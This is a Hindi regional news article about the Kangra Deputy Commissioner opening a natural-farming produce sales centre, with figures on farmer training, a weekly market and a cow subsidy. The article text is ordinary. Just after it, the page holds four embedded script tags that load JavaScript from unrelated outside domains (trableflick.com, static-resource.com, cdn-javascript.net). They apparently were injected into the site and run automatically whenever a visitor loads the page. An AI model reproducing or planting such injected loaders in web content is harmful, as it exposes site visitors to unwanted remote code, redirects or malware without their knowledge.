Categories: हिमाचल

उपायुक्त ने किया प्राकृतिक खेती उत्पाद केन्द्र का शुभारंभ

<p>उपायुक्त कांगड़ा राकेश कुमार प्रजापति ने आज उपायुक्त कार्यालय परिसर में आतमा कांगड़ा द्वारा प्रायोजित प्राकृतिक खेती उत्पाद विक्रय केन्द्र का शुभारंभ किया। उन्होंने कहा कि पूरे प्रदेश में सुभाष पालेकर प्राकृतिक खेती पर जोर दिया जा रहा है। जिसके लिए बजट का प्रावधान किया गया है। जिला कांगडा में प्राकृतिक खेती खुशहाल किसान योजना के अन्तर्गत 12 हजार किसानों को प्राकृतिक खेती अपनाने का लक्ष्य निर्धारित किया गया था। इसके अन्तर्गत आत्मा कांगडा द्वारा 15 विकास खंडो में 486 दो दिवसीय प्रशिक्षण कार्यक्रम आयोजित किये गये। इसके अन्तर्गत 14135 किसानों को प्रशिक्षण दिया गया और 12536 किसानों ने इस विधि को अपनाया तथा अपने खेतों में जहर मुक्त सब्जियों और फसलों का उत्पादन किया।</p>

<p>उन्होंने कहा कि हर शुक्रवार को उपायुक्त कार्यालय के परिसर में प्राकृतिक खेती अपना रहे किसानों द्वारा ही जहर मुक्त सब्जियों का विक्रय किया जाएगा जहां पर लोगों को कीट नाशक मुक्त, रसायन मुक्त उत्पाद उचित दामों पर मिलेंगे। किसानों ने सब्जियों का उत्पादन तो किया पर उन उत्पादों को लोगों तक कैसे पहुंचाया जाए और कैसे प्रचार-प्रसार किया जाए इसके लिए यह प्राकृतिक खेती उत्पाद केन्द्र लोगों को समर्पित किया गया है। अभी जिला स्तर पर इसकी शुरूआत की गई है और शीघ्र ही इसे ब्लॉक स्तर और पंचायत स्तर पर भी ले जाने के प्रयास किये जाएंगे।</p>

<p>उन्होंने लोगों से आह्वान किया कि वे रसायन रहित उत्पादों का फायदा उठाएं। इससे किसानाों को भी प्रोत्साहन मिलेगा और उनकी आजीविका भी बढ़ेगी। उन्होंने कहा कि न्यूनतम लागत, अधिक उपज, उच्च गुणवत्ता, स्वस्थ पर्यावरण सही मायने में किसानों-बागवानों को समृद्ध, खुशहाल स्वावलम्बी एवं आय दोगनी देने वाली खेती ही सुभाष पालेकर प्राकृतिक खेती है। आत्मा कांगड़ा द्वारा जिन प्रशिक्षणार्थियों ने इस विधि को अपनाया है उन सभी के पते को आधार और टेलीफोन नम्बर के साथ जोडकर पोर्टल में डाला गया है। उन्होंने बताया कि इस विधि को अपनाने वाले किसानों को देसी गाय पर 25 हजार रुपये का अनुदान दिया जा रहा है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578653281954″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

7 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

8 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

8 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

8 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

9 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

9 hours ago